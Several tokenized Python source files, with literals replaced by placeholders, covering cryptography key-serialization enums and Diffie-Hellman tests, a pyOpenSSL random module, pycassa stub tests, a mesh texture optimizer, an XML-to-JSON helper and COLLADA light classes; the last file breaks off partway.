class Encoding ( Enum ) : <EOL> PEM = "<STR_LIT>" <EOL> DER = "<STR_LIT>" <EOL> class PrivateFormat ( Enum ) : <EOL> PKCS8 = "<STR_LIT>" <EOL> TraditionalOpenSSL = "<STR_LIT>" <EOL> class PublicFormat ( Enum ) : <EOL> SubjectPublicKeyInfo = "<STR_LIT>" <EOL> PKCS1 = "<STR_LIT>" <EOL> @ six . add_metaclass ( abc . ABCMeta ) <EOL> class KeySerializationEncryption ( object ) : <EOL> pass <EOL> @ utils . register_interface ( KeySerializationEncryption ) <EOL> class BestAvailableEncryption ( object ) : <EOL> def __init__ ( self , password ) : <EOL> if not isinstance ( password , bytes ) or len ( password ) == <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> self . password = password <EOL> @ utils . register_interface ( KeySerializationEncryption ) <EOL> class NoEncryption ( object ) : <EOL> pass </s>
<s> from __future__ import absolute_import , division , print_function <EOL> import pytest <EOL> from cryptography . hazmat . primitives . asymmetric import dh <EOL> def test_dh_parameternumbers ( ) : <EOL> params = dh . DHParameterNumbers ( <EOL> <NUM_LIT> , <NUM_LIT:3> <EOL> ) <EOL> assert params . p == <NUM_LIT> <EOL> assert params . g == <NUM_LIT:3> <EOL> with pytest . raises ( TypeError ) : <EOL> dh . DHParameterNumbers ( <EOL> None , <NUM_LIT:3> <EOL> ) <EOL> with pytest . raises ( TypeError ) : <EOL> dh . DHParameterNumbers ( <EOL> <NUM_LIT> , None <EOL> ) <EOL> with pytest . raises ( TypeError ) : <EOL> dh . DHParameterNumbers ( <EOL> None , None <EOL> ) <EOL> def test_dh_numbers ( ) : <EOL> params = dh . DHParameterNumbers ( <EOL> <NUM_LIT> , <NUM_LIT:3> <EOL> ) <EOL> public = dh . DHPublicNumbers ( <EOL> <NUM_LIT:1> , params <EOL> ) <EOL> assert public . parameter_numbers is params <EOL> assert public . y == <NUM_LIT:1> <EOL> with pytest . raises ( TypeError ) : <EOL> dh . DHPublicNumbers ( <EOL> <NUM_LIT:1> , None <EOL> ) <EOL> with pytest . raises ( TypeError ) : <EOL> dh . DHPublicNumbers ( <EOL> None , params <EOL> ) <EOL> private = dh . DHPrivateNumbers ( <EOL> <NUM_LIT:1> , public <EOL> ) <EOL> assert private . public_numbers is public <EOL> assert private . x == <NUM_LIT:1> <EOL> with pytest . raises ( TypeError ) : <EOL> dh . DHPrivateNumbers ( <EOL> <NUM_LIT:1> , None <EOL> ) <EOL> with pytest . raises ( TypeError ) : <EOL> dh . DHPrivateNumbers ( <EOL> None , public <EOL> ) <EOL> def test_dh_parameter_numbers_equality ( ) : <EOL> assert dh . DHParameterNumbers ( <NUM_LIT> , <NUM_LIT:3> ) == dh . DHParameterNumbers ( <NUM_LIT> , <NUM_LIT:3> ) <EOL> assert dh . DHParameterNumbers ( <NUM_LIT:6> , <NUM_LIT:3> ) != dh . DHParameterNumbers ( <NUM_LIT> , <NUM_LIT:3> ) <EOL> assert dh . DHParameterNumbers ( <NUM_LIT> , <NUM_LIT:0> ) != dh . DHParameterNumbers ( <NUM_LIT> , <NUM_LIT:3> ) <EOL> assert dh . DHParameterNumbers ( <NUM_LIT> , <NUM_LIT:0> ) != object ( ) <EOL> def test_dh_private_numbers_equality ( ) : <EOL> params = dh . DHParameterNumbers ( <NUM_LIT> , <NUM_LIT:3> ) <EOL> public = dh . DHPublicNumbers ( <NUM_LIT:1> , params ) <EOL> private = dh . DHPrivateNumbers ( <NUM_LIT:2> , public ) <EOL> assert private == dh . DHPrivateNumbers ( <NUM_LIT:2> , public ) <EOL> assert private != dh . DHPrivateNumbers ( <NUM_LIT:0> , public ) <EOL> assert private != dh . DHPrivateNumbers ( <NUM_LIT:2> , dh . DHPublicNumbers ( <NUM_LIT:0> , params ) ) <EOL> assert private != dh . DHPrivateNumbers ( <EOL> <NUM_LIT:2> , dh . DHPublicNumbers ( <NUM_LIT:1> , dh . DHParameterNumbers ( <NUM_LIT> , <NUM_LIT:0> ) ) <EOL> ) <EOL> assert private != object ( ) <EOL> def test_dh_public_numbers_equality ( ) : <EOL> params = dh . DHParameterNumbers ( <NUM_LIT> , <NUM_LIT:3> ) <EOL> public = dh . DHPublicNumbers ( <NUM_LIT:1> , params ) <EOL> assert public == dh . DHPublicNumbers ( <NUM_LIT:1> , params ) <EOL> assert public != dh . DHPublicNumbers ( <NUM_LIT:0> , params ) <EOL> assert public != dh . DHPublicNumbers ( <NUM_LIT:1> , dh . DHParameterNumbers ( <NUM_LIT> , <NUM_LIT:0> ) ) <EOL> assert public != object ( ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import warnings <EOL> from functools import partial <EOL> from six import integer_types as _integer_types <EOL> from OpenSSL . _util import ( <EOL> ffi as _ffi , <EOL> lib as _lib , <EOL> exception_from_error_queue as _exception_from_error_queue , <EOL> path_string as _path_string ) <EOL> class Error ( Exception ) : <EOL> """<STR_LIT>""" <EOL> _raise_current_error = partial ( _exception_from_error_queue , Error ) <EOL> _unspecified = object ( ) <EOL> _builtin_bytes = bytes <EOL> def bytes ( num_bytes ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( num_bytes , _integer_types ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if num_bytes < <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> result_buffer = _ffi . new ( "<STR_LIT>" , num_bytes ) <EOL> result_code = _lib . RAND_bytes ( result_buffer , num_bytes ) <EOL> if result_code == - <NUM_LIT:1> : <EOL> _raise_current_error ( ) <EOL> return _ffi . buffer ( result_buffer ) [ : ] <EOL> def add ( buffer , entropy ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( buffer , _builtin_bytes ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if not isinstance ( entropy , int ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> _lib . RAND_add ( buffer , len ( buffer ) , entropy ) <EOL> def seed ( buffer ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( buffer , _builtin_bytes ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> _lib . RAND_seed ( buffer , len ( buffer ) ) <EOL> def status ( ) : <EOL> """<STR_LIT>""" <EOL> return _lib . RAND_status ( ) <EOL> def egd ( path , bytes = _unspecified ) : <EOL> """<STR_LIT>""" <EOL> warnings . warn ( "<STR_LIT>" , <EOL> DeprecationWarning ) <EOL> if not isinstance ( path , _builtin_bytes ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if bytes is _unspecified : <EOL> bytes = <NUM_LIT:255> <EOL> elif not isinstance ( bytes , int ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> seed ( os . urandom ( bytes ) ) <EOL> return bytes <EOL> def cleanup ( ) : <EOL> """<STR_LIT>""" <EOL> _lib . RAND_cleanup ( ) <EOL> def load_file ( filename , maxbytes = _unspecified ) : <EOL> """<STR_LIT>""" <EOL> filename = _path_string ( filename ) <EOL> if maxbytes is _unspecified : <EOL> maxbytes = - <NUM_LIT:1> <EOL> elif not isinstance ( maxbytes , int ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> return _lib . RAND_load_file ( filename , maxbytes ) <EOL> def write_file ( filename ) : <EOL> """<STR_LIT>""" <EOL> filename = _path_string ( filename ) <EOL> return _lib . RAND_write_file ( filename ) <EOL> def screen ( ) : <EOL> """<STR_LIT>""" <EOL> _lib . RAND_screen ( ) <EOL> if getattr ( _lib , '<STR_LIT>' , None ) is None : <EOL> del screen <EOL> _lib . ERR_load_RAND_strings ( ) </s>
<s> import unittest <EOL> import time <EOL> from nose . tools import assert_raises , assert_equal , assert_true <EOL> from pycassa import index , ColumnFamily , ConnectionPool , NotFoundException <EOL> from pycassa . contrib . stubs import ColumnFamilyStub , ConnectionPoolStub <EOL> from pycassa . util import convert_time_to_uuid <EOL> pool = cf = indexed_cf = None <EOL> pool_stub = cf_stub = indexed_cf_stub = None <EOL> def setup_module ( ) : <EOL> global pool , cf , indexed_cf , pool_stub , indexed_cf_stub , cf_stub <EOL> credentials = { '<STR_LIT:username>' : '<STR_LIT>' , '<STR_LIT:password>' : '<STR_LIT>' } <EOL> pool = ConnectionPool ( keyspace = '<STR_LIT>' , <EOL> credentials = credentials , timeout = <NUM_LIT:1.0> ) <EOL> cf = ColumnFamily ( pool , '<STR_LIT>' , dict_class = TestDict ) <EOL> indexed_cf = ColumnFamily ( pool , '<STR_LIT>' ) <EOL> pool_stub = ConnectionPoolStub ( keyspace = '<STR_LIT>' , <EOL> credentials = credentials , timeout = <NUM_LIT:1.0> ) <EOL> cf_stub = ColumnFamilyStub ( pool_stub , '<STR_LIT>' , dict_class = TestDict ) <EOL> indexed_cf_stub = ColumnFamilyStub ( pool_stub , '<STR_LIT>' ) <EOL> def teardown_module ( ) : <EOL> cf . truncate ( ) <EOL> cf_stub . truncate ( ) <EOL> indexed_cf . truncate ( ) <EOL> indexed_cf_stub . truncate ( ) <EOL> pool . dispose ( ) <EOL> class TestDict ( dict ) : <EOL> pass <EOL> class TestColumnFamilyStub ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> pass <EOL> def tearDown ( self ) : <EOL> for test_cf in ( cf , cf_stub ) : <EOL> for key , columns in test_cf . get_range ( ) : <EOL> test_cf . remove ( key ) <EOL> def test_empty ( self ) : <EOL> key = '<STR_LIT>' <EOL> for test_cf in ( cf , cf_stub ) : <EOL> assert_raises ( NotFoundException , test_cf . get , key ) <EOL> assert_equal ( len ( test_cf . multiget ( [ key ] ) ) , <NUM_LIT:0> ) <EOL> for key , columns in test_cf . get_range ( ) : <EOL> assert_equal ( len ( columns ) , <NUM_LIT:0> ) <EOL> def test_insert_get ( self ) : <EOL> key = '<STR_LIT>' <EOL> columns = { '<STR_LIT:1>' : '<STR_LIT>' , '<STR_LIT:2>' : '<STR_LIT>' } <EOL> for test_cf in ( cf , cf_stub ) : <EOL> assert_raises ( NotFoundException , test_cf . get , key ) <EOL> ts = test_cf . insert ( key , columns ) <EOL> assert_true ( isinstance ( ts , ( int , long ) ) ) <EOL> assert_equal ( test_cf . get ( key ) , columns ) <EOL> def test_insert_get_column_start_and_finish_reversed ( self ) : <EOL> key = '<STR_LIT>' <EOL> columns = { '<STR_LIT:1>' : '<STR_LIT>' , '<STR_LIT:2>' : '<STR_LIT>' } <EOL> for test_cf in ( cf , cf_stub ) : <EOL> assert_raises ( NotFoundException , test_cf . get , key ) <EOL> ts = test_cf . insert ( key , columns ) <EOL> assert_true ( isinstance ( ts , ( int , long ) ) ) <EOL> test_cf . get ( key , column_reversed = True ) <EOL> def test_insert_get_column_start_and_finish ( self ) : <EOL> key = '<STR_LIT>' <EOL> columns = { '<STR_LIT:a>' : '<STR_LIT>' , '<STR_LIT:b>' : '<STR_LIT>' , '<STR_LIT:c>' : '<STR_LIT>' , '<STR_LIT:d>' : '<STR_LIT>' } <EOL> for test_cf in ( cf , cf_stub ) : <EOL> assert_raises ( NotFoundException , test_cf . get , key ) <EOL> ts = test_cf . insert ( key , columns ) <EOL> assert_true ( isinstance ( ts , ( int , long ) ) ) <EOL> assert_equal ( test_cf . get ( key , column_start = '<STR_LIT:b>' , column_finish = '<STR_LIT:c>' ) , { '<STR_LIT:b>' : '<STR_LIT>' , '<STR_LIT:c>' : '<STR_LIT>' } ) <EOL> def test_insert_get_column_start_and_reversed ( self ) : <EOL> key = '<STR_LIT>' <EOL> columns = { '<STR_LIT:a>' : '<STR_LIT>' , '<STR_LIT:b>' : '<STR_LIT>' , '<STR_LIT:c>' : '<STR_LIT>' , '<STR_LIT:d>' : '<STR_LIT>' } <EOL> for test_cf in ( cf , cf_stub ) : <EOL> assert_raises ( NotFoundException , test_cf . get , key ) <EOL> ts = test_cf . insert ( key , columns ) <EOL> assert_true ( isinstance ( ts , ( int , long ) ) ) <EOL> assert_equal ( test_cf . get ( key , column_start = '<STR_LIT:b>' , column_reversed = True ) , { '<STR_LIT:b>' : '<STR_LIT>' , '<STR_LIT:a>' : '<STR_LIT>' } ) <EOL> def test_insert_get_column_count ( self ) : <EOL> key = '<STR_LIT>' <EOL> columns = { '<STR_LIT:a>' : '<STR_LIT>' , '<STR_LIT:b>' : '<STR_LIT>' , '<STR_LIT:c>' : '<STR_LIT>' , '<STR_LIT:d>' : '<STR_LIT>' } <EOL> for test_cf in ( cf , cf_stub ) : <EOL> assert_raises ( NotFoundException , test_cf . get , key ) <EOL> ts = test_cf . insert ( key , columns ) <EOL> assert_true ( isinstance ( ts , ( int , long ) ) ) <EOL> assert_equal ( test_cf . get ( key , column_count = <NUM_LIT:3> ) , { '<STR_LIT:a>' : '<STR_LIT>' , '<STR_LIT:b>' : '<STR_LIT>' , '<STR_LIT:c>' : '<STR_LIT>' } ) <EOL> def test_insert_get_default_column_count ( self ) : <EOL> keys = [ str ( i ) for i in range ( <NUM_LIT:1000> ) ] <EOL> keys . sort ( ) <EOL> keys_and_values = [ ( key , key ) for key in keys ] <EOL> key = '<STR_LIT>' <EOL> for test_cf in ( cf , cf_stub ) : <EOL> assert_raises ( NotFoundException , test_cf . get , key ) <EOL> test_cf . insert ( key , dict ( key_value for key_value in keys_and_values ) ) <EOL> assert_equal ( test_cf . get ( key ) , dict ( [ key_value for key_value in keys_and_values ] [ : <NUM_LIT:100> ] ) ) <EOL> def test_insert_multiget ( self ) : <EOL> key1 = '<STR_LIT>' <EOL> columns1 = { '<STR_LIT:1>' : '<STR_LIT>' , '<STR_LIT:2>' : '<STR_LIT>' } <EOL> key2 = '<STR_LIT>' <EOL> columns2 = { '<STR_LIT:3>' : '<STR_LIT>' , '<STR_LIT:4>' : '<STR_LIT>' } <EOL> missing_key = '<STR_LIT>' <EOL> for test_cf in ( cf , cf_stub ) : <EOL> test_cf . insert ( key1 , columns1 ) <EOL> test_cf . insert ( key2 , columns2 ) <EOL> rows = test_cf . multiget ( [ key1 , key2 , missing_key ] ) <EOL> assert_equal ( len ( rows ) , <NUM_LIT:2> ) <EOL> assert_equal ( rows [ key1 ] , columns1 ) <EOL> assert_equal ( rows [ key2 ] , columns2 ) <EOL> assert_true ( missing_key not in rows ) <EOL> def test_insert_multiget_column_start_and_finish ( self ) : <EOL> key1 = '<STR_LIT>' <EOL> columns1 = { '<STR_LIT:1>' : '<STR_LIT>' , '<STR_LIT:2>' : '<STR_LIT>' } <EOL> key2 = '<STR_LIT>' <EOL> columns2 = { '<STR_LIT:3>' : '<STR_LIT>' , '<STR_LIT:4>' : '<STR_LIT>' } <EOL> missing_key = '<STR_LIT>' <EOL> for test_cf in ( cf , cf_stub ) : <EOL> test_cf . insert ( key1 , columns1 ) <EOL> test_cf . insert ( key2 , columns2 ) <EOL> rows = test_cf . multiget ( [ key1 , key2 , missing_key ] , column_start = '<STR_LIT:2>' , column_finish = '<STR_LIT:3>' ) <EOL> assert_equal ( len ( rows ) , <NUM_LIT:2> ) <EOL> assert_equal ( rows [ key1 ] , { '<STR_LIT:2>' : '<STR_LIT>' } ) <EOL> assert_equal ( rows [ key2 ] , { '<STR_LIT:3>' : '<STR_LIT>' } ) <EOL> assert_true ( missing_key not in rows ) <EOL> def test_insert_multiget_column_finish_and_reversed ( self ) : <EOL> key1 = '<STR_LIT>' <EOL> columns1 = { '<STR_LIT:1>' : '<STR_LIT>' , '<STR_LIT:3>' : '<STR_LIT>' } <EOL> key2 = '<STR_LIT>' <EOL> columns2 = { '<STR_LIT:5>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> missing_key = '<STR_LIT>' <EOL> for test_cf in ( cf , cf_stub ) : <EOL> test_cf . insert ( key1 , columns1 ) <EOL> test_cf . insert ( key2 , columns2 ) <EOL> rows = test_cf . multiget ( [ key1 , key2 , missing_key ] , column_finish = '<STR_LIT:3>' , column_reversed = True ) <EOL> assert_equal ( len ( rows ) , <NUM_LIT:2> ) <EOL> assert_equal ( rows [ key1 ] , { '<STR_LIT:3>' : '<STR_LIT>' } ) <EOL> assert_equal ( rows [ key2 ] , { '<STR_LIT:5>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert_true ( missing_key not in rows ) <EOL> def test_insert_multiget_column_start_column_count ( self ) : <EOL> key1 = '<STR_LIT>' <EOL> columns1 = { '<STR_LIT:1>' : '<STR_LIT>' , '<STR_LIT:2>' : '<STR_LIT>' } <EOL> key2 = '<STR_LIT>' <EOL> columns2 = { '<STR_LIT:3>' : '<STR_LIT>' , '<STR_LIT:4>' : '<STR_LIT>' } <EOL> missing_key = '<STR_LIT>' <EOL> for test_cf in ( cf , cf_stub ) : <EOL> test_cf . insert ( key1 , columns1 ) <EOL> test_cf . insert ( key2 , columns2 ) <EOL> rows = test_cf . multiget ( [ key1 , key2 , missing_key ] , column_count = <NUM_LIT:1> , column_start = '<STR_LIT:2>' ) <EOL> assert_equal ( len ( rows ) , <NUM_LIT:2> ) <EOL> assert_equal ( rows [ key1 ] , { '<STR_LIT:2>' : '<STR_LIT>' } ) <EOL> assert_equal ( rows [ key2 ] , { '<STR_LIT:3>' : '<STR_LIT>' } ) <EOL> assert_true ( missing_key not in rows ) <EOL> def test_insert_multiget_default_column_count ( self ) : <EOL> keys = [ str ( i ) for i in range ( <NUM_LIT:1000> ) ] <EOL> keys . sort ( ) <EOL> keys_and_values = [ ( key , key ) for key in keys ] <EOL> key = '<STR_LIT>' <EOL> for test_cf in ( cf , cf_stub ) : <EOL> test_cf . insert ( key , dict ( key_value for key_value in keys_and_values ) ) <EOL> rows = test_cf . multiget ( [ key ] ) <EOL> assert_equal ( len ( rows ) , <NUM_LIT:1> ) <EOL> assert_equal ( rows [ key ] , dict ( [ key_value for key_value in keys_and_values ] [ : <NUM_LIT:100> ] ) ) <EOL> def insert_insert_get_indexed_slices ( self ) : <EOL> columns = { '<STR_LIT>' : <NUM_LIT:1> L } <EOL> keys = set ( ) <EOL> for i in range ( <NUM_LIT:1> , <NUM_LIT:4> ) : <EOL> indexed_cf . insert ( '<STR_LIT>' % i , columns ) <EOL> indexed_cf_stub . insert ( '<STR_LIT>' % i , columns ) <EOL> keys . add ( '<STR_LIT>' % i ) <EOL> expr = index . create_index_expression ( column_name = '<STR_LIT>' , value = <NUM_LIT:1> L ) <EOL> clause = index . create_index_clause ( [ expr ] ) <EOL> for test_indexed_cf in ( indexed_cf , indexed_cf_stub ) : <EOL> count = <NUM_LIT:0> <EOL> for key , cols in test_indexed_cf . get_indexed_slices ( clause ) : <EOL> assert_equal ( cols , columns ) <EOL> assert key in keys <EOL> count += <NUM_LIT:1> <EOL> assert_equal ( count , <NUM_LIT:3> ) <EOL> def test_remove ( self ) : <EOL> key = '<STR_LIT>' <EOL> for test_cf in ( cf , cf_stub ) : <EOL> columns = { '<STR_LIT:1>' : '<STR_LIT>' , '<STR_LIT:2>' : '<STR_LIT>' } <EOL> test_cf . insert ( key , columns ) <EOL> test_cf . remove ( key , columns = [ ] ) <EOL> assert_equal ( test_cf . get ( key ) , columns ) <EOL> test_cf . remove ( key , columns = [ '<STR_LIT:2>' ] ) <EOL> del columns [ '<STR_LIT:2>' ] <EOL> assert_equal ( test_cf . get ( key ) , { '<STR_LIT:1>' : '<STR_LIT>' } ) <EOL> test_cf . remove ( key ) <EOL> assert_raises ( NotFoundException , test_cf . get , key ) <EOL> def test_insert_get_tuuids ( self ) : <EOL> key = '<STR_LIT>' <EOL> columns = ( ( convert_time_to_uuid ( time . time ( ) - <NUM_LIT:1000> , randomize = True ) , '<STR_LIT>' ) , <EOL> ( convert_time_to_uuid ( time . time ( ) , randomize = True ) , '<STR_LIT>' ) ) <EOL> for test_cf in ( cf , cf_stub ) : <EOL> assert_raises ( NotFoundException , test_cf . get , key ) <EOL> ts = test_cf . insert ( key , dict ( columns ) ) <EOL> assert_true ( isinstance ( ts , ( int , long ) ) ) <EOL> assert_equal ( test_cf . get ( key ) . keys ( ) , [ x [ <NUM_LIT:0> ] for x in columns ] ) </s>
<s> from meshtool . filters . base_filters import OptimizationFilter <EOL> from meshtool . util import Image <EOL> import sys <EOL> from StringIO import StringIO <EOL> import numpy <EOL> def optimizeTextures ( mesh ) : <EOL> previous_images = [ ] <EOL> for cimg in mesh . images : <EOL> previous_images . append ( cimg . path ) <EOL> pilimg = cimg . pilimage <EOL> if pilimg is None : <EOL> imgdata = cimg . data <EOL> if imgdata is None : <EOL> print >> sys . stderr , "<STR_LIT>" <EOL> continue <EOL> try : <EOL> from panda3d . core import Texture <EOL> from panda3d . core import StringStream <EOL> from panda3d . core import PNMImage <EOL> except ImportError : <EOL> print >> sys . stderr , '<STR_LIT>' <EOL> continue <EOL> t = Texture ( ) <EOL> success = t . readDds ( StringStream ( imgdata ) ) <EOL> if success == <NUM_LIT:0> : <EOL> print >> sys . stderr , '<STR_LIT>' <EOL> continue <EOL> outdata = t . getRamImageAs ( '<STR_LIT>' ) . getData ( ) <EOL> try : <EOL> im = Image . fromstring ( '<STR_LIT>' , ( t . getXSize ( ) , t . getYSize ( ) ) , outdata ) <EOL> im . load ( ) <EOL> except IOError : <EOL> print >> sys . stderr , '<STR_LIT>' <EOL> continue <EOL> pilimg = im <EOL> if pilimg . format == '<STR_LIT>' : <EOL> continue <EOL> if '<STR_LIT:A>' in pilimg . getbands ( ) : <EOL> alpha = numpy . array ( pilimg . split ( ) [ - <NUM_LIT:1> ] . getdata ( ) ) <EOL> if not numpy . any ( alpha < <NUM_LIT:255> ) : <EOL> alpha = None <EOL> pilimg = pilimg . convert ( '<STR_LIT>' ) <EOL> if '<STR_LIT:A>' in pilimg . getbands ( ) : <EOL> output_format = '<STR_LIT>' <EOL> output_extension = '<STR_LIT>' <EOL> output_options = { '<STR_LIT>' : True } <EOL> else : <EOL> if pilimg . format != '<STR_LIT>' : <EOL> pilimg = pilimg . convert ( "<STR_LIT>" ) <EOL> output_format = '<STR_LIT>' <EOL> output_extension = '<STR_LIT>' <EOL> output_options = { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : True } <EOL> if cimg . path . lower ( ) [ - len ( output_extension ) : ] != output_extension : <EOL> dot = cimg . path . rfind ( '<STR_LIT:.>' ) <EOL> before_ext = cimg . path [ <NUM_LIT:0> : dot ] if dot != - <NUM_LIT:1> else cimg . path <EOL> while before_ext + output_extension in previous_images : <EOL> before_ext = before_ext + '<STR_LIT>' <EOL> cimg . path = before_ext + output_extension <EOL> previous_images . append ( cimg . path ) <EOL> outbuf = StringIO ( ) <EOL> try : <EOL> pilimg . save ( outbuf , output_format , ** output_options ) <EOL> except IOError , ex : <EOL> print ex <EOL> cimg . data = outbuf . getvalue ( ) <EOL> def FilterGenerator ( ) : <EOL> class OptimizeTexturesFilter ( OptimizationFilter ) : <EOL> def __init__ ( self ) : <EOL> super ( OptimizeTexturesFilter , self ) . __init__ ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def apply ( self , mesh ) : <EOL> optimizeTextures ( mesh ) <EOL> return mesh <EOL> return OptimizeTexturesFilter ( ) <EOL> from meshtool . filters import factory <EOL> factory . register ( FilterGenerator ( ) . name , FilterGenerator ) </s>
<s> try : <EOL> import json <EOL> except ImportError : <EOL> import simplejson as json <EOL> from itertools import groupby <EOL> def bare_tag ( elem ) : <EOL> return elem . tag . rsplit ( '<STR_LIT:}>' , <NUM_LIT:1> ) [ - <NUM_LIT:1> ] <EOL> def to_pod ( xml ) : <EOL> properties = { } <EOL> if xml . text is not None : <EOL> properties [ '<STR_LIT:$>' ] = xml . text <EOL> for ( key , val ) in xml . attrib . iteritems ( ) : <EOL> properties [ '<STR_LIT:@>' + key ] = val <EOL> sorted_children = sorted ( [ ( bare_tag ( e ) , e ) for e in xml ] ) <EOL> for key , group in groupby ( sorted_children , key = lambda t : t [ <NUM_LIT:0> ] ) : <EOL> grouped_elements = list ( group ) <EOL> if len ( grouped_elements ) > <NUM_LIT:1> : <EOL> properties [ key ] = [ to_pod ( e ) for k , e in grouped_elements ] <EOL> else : <EOL> properties [ key ] = to_pod ( grouped_elements [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] ) <EOL> return properties <EOL> def to_json ( xml , ** kargs ) : <EOL> return json . JSONEncoder ( ** kargs ) . encode ( { bare_tag ( xml ) : to_pod ( xml ) } ) </s>
<s> """<STR_LIT>""" <EOL> import numpy <EOL> from collada . common import DaeObject , E , tag <EOL> from collada . common import DaeIncompleteError , DaeBrokenRefError , DaeMalformedError , DaeUnsupportedError <EOL> from collada . util import _correctValInNode <EOL> from collada . xmlutil import etree as ElementTree <EOL> class Light ( DaeObject ) : <EOL> """<STR_LIT>""" <EOL> @ staticmethod <EOL> def load ( collada , localscope , node ) : <EOL> tecnode = node . find ( tag ( '<STR_LIT>' ) ) <EOL> if tecnode is None or len ( tecnode ) == <NUM_LIT:0> : <EOL> raise DaeIncompleteError ( '<STR_LIT>' ) <EOL> lightnode = tecnode [ <NUM_LIT:0> ] <EOL> if lightnode . tag == tag ( '<STR_LIT>' ) : <EOL> return DirectionalLight . load ( collada , localscope , node ) <EOL> elif lightnode . tag == tag ( '<STR_LIT>' ) : <EOL> return PointLight . load ( collada , localscope , node ) <EOL> elif lightnode . tag == tag ( '<STR_LIT>' ) : <EOL> return AmbientLight . load ( collada , localscope , node ) <EOL> elif lightnode . tag == tag ( '<STR_LIT>' ) : <EOL> return SpotLight . load ( collada , localscope , node ) <EOL> else : <EOL> raise DaeUnsupportedError ( '<STR_LIT>' % lightnode . tag ) <EOL> class DirectionalLight ( Light ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , id , color , xmlnode = None ) : <EOL> """<STR_LIT>""" <EOL> self . id = id <EOL> """<STR_LIT>""" <EOL> self . direction = numpy . array ( [ <NUM_LIT:0> , <NUM_LIT:0> , - <NUM_LIT:1> ] , dtype = numpy . float32 ) <EOL> self . color = color <EOL> """<STR_LIT>""" <EOL> if xmlnode != None : <EOL> self . xmlnode = xmlnode <EOL> """<STR_LIT>""" <EOL> else : <EOL> self . xmlnode = E . light ( <EOL> E . technique_common ( <EOL> E . directional ( <EOL> E . color ( '<STR_LIT:U+0020>' . join ( map ( str , self . color ) ) ) <EOL> ) <EOL> ) <EOL> , id = self . id , name = self . id ) <EOL> def save ( self ) : <EOL> """<STR_LIT>""" <EOL> self . xmlnode . set ( '<STR_LIT:id>' , self . id ) <EOL> self . xmlnode . set ( '<STR_LIT:name>' , self . id ) <EOL> colornode = self . xmlnode . find ( '<STR_LIT>' % ( tag ( '<STR_LIT>' ) , <EOL> tag ( '<STR_LIT>' ) , tag ( '<STR_LIT>' ) ) ) <EOL> colornode . text = '<STR_LIT:U+0020>' . join ( map ( str , self . color ) ) <EOL> @ staticmethod <EOL> def load ( collada , localscope , node ) : <EOL> colornode = node . find ( '<STR_LIT>' % ( tag ( '<STR_LIT>' ) , tag ( '<STR_LIT>' ) , <EOL> tag ( '<STR_LIT>' ) ) ) <EOL> if colornode is None : <EOL> raise DaeIncompleteError ( '<STR_LIT>' ) <EOL> try : <EOL> color = tuple ( [ float ( v ) for v in colornode . text . split ( ) ] ) <EOL> except ValueError as ex : <EOL> raise DaeMalformedError ( '<STR_LIT>' ) <EOL> return DirectionalLight ( node . get ( '<STR_LIT:id>' ) , color , xmlnode = node ) <EOL> def bind ( self , matrix ) : <EOL> """<STR_LIT>""" <EOL> return BoundDirectionalLight ( self , matrix ) <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % ( self . id , ) <EOL> def __repr__ ( self ) : <EOL> return str ( self ) <EOL> class AmbientLight ( Light ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , id , color , xmlnode = None ) : <EOL> """<STR_LIT>""" <EOL> self . id = id <EOL> """<STR_LIT>""" <EOL> self . color = color <EOL> """<STR_LIT>""" <EOL> if xmlnode != None : <EOL> self . xmlnode = xmlnode <EOL> """<STR_LIT>""" <EOL> else : <EOL> self . xmlnode = E . light ( <EOL> E . technique_common ( <EOL> E . ambient ( <EOL> E . color ( '<STR_LIT:U+0020>' . join ( map ( str , self . color ) ) ) <EOL> ) <EOL> ) <EOL> , id = self . id , name = self . id ) <EOL> def save ( self ) : <EOL> """<STR_LIT>""" <EOL> self . xmlnode . set ( '<STR_LIT:id>' , self . id ) <EOL> self . xmlnode . set ( '<STR_LIT:name>' , self . id ) <EOL> colornode = self . xmlnode . find ( '<STR_LIT>' % ( tag ( '<STR_LIT>' ) , <EOL> tag ( '<STR_LIT>' ) , tag ( '<STR_LIT>' ) ) ) <EOL> colornode . text = '<STR_LIT:U+0020>' . join ( map ( str , self . color ) ) <EOL> @ staticmethod <EOL> def load ( collada , localscope , node ) : <EOL> colornode = node . find ( '<STR_LIT>' % ( tag ( '<STR_LIT>' ) , <EOL> tag ( '<STR_LIT>' ) , tag ( '<STR_LIT>' ) ) ) <EOL> if colornode is None : <EOL> raise DaeIncompleteError ( '<STR_LIT>' ) <EOL> try : <EOL> color = tuple ( [ float ( v ) for v in colornode . text . split ( ) ] ) <EOL> except ValueError as ex : <EOL> raise DaeMalformedError ( '<STR_LIT>' ) <EOL> return AmbientLight ( node . get ( '<STR_LIT:id>' ) , color , xmlnode = node ) <EOL> def bind ( self , matrix ) : <EOL> """<STR_LIT>""" <EOL> return BoundAmbientLight ( self , matrix ) <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % ( self . id , ) <EOL> def __repr__ ( self ) : <EOL> return str ( self ) <EOL> class PointLight ( Light ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , id , color , constant_att = None , linear_att = None , <EOL> quad_att = None , zfar = None , xmlnode = None ) : <EOL> """<STR_LIT>""" <EOL> self . id = id <EOL> """<STR_LIT>""" <EOL> self . position = numpy . array ( [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , dtype = 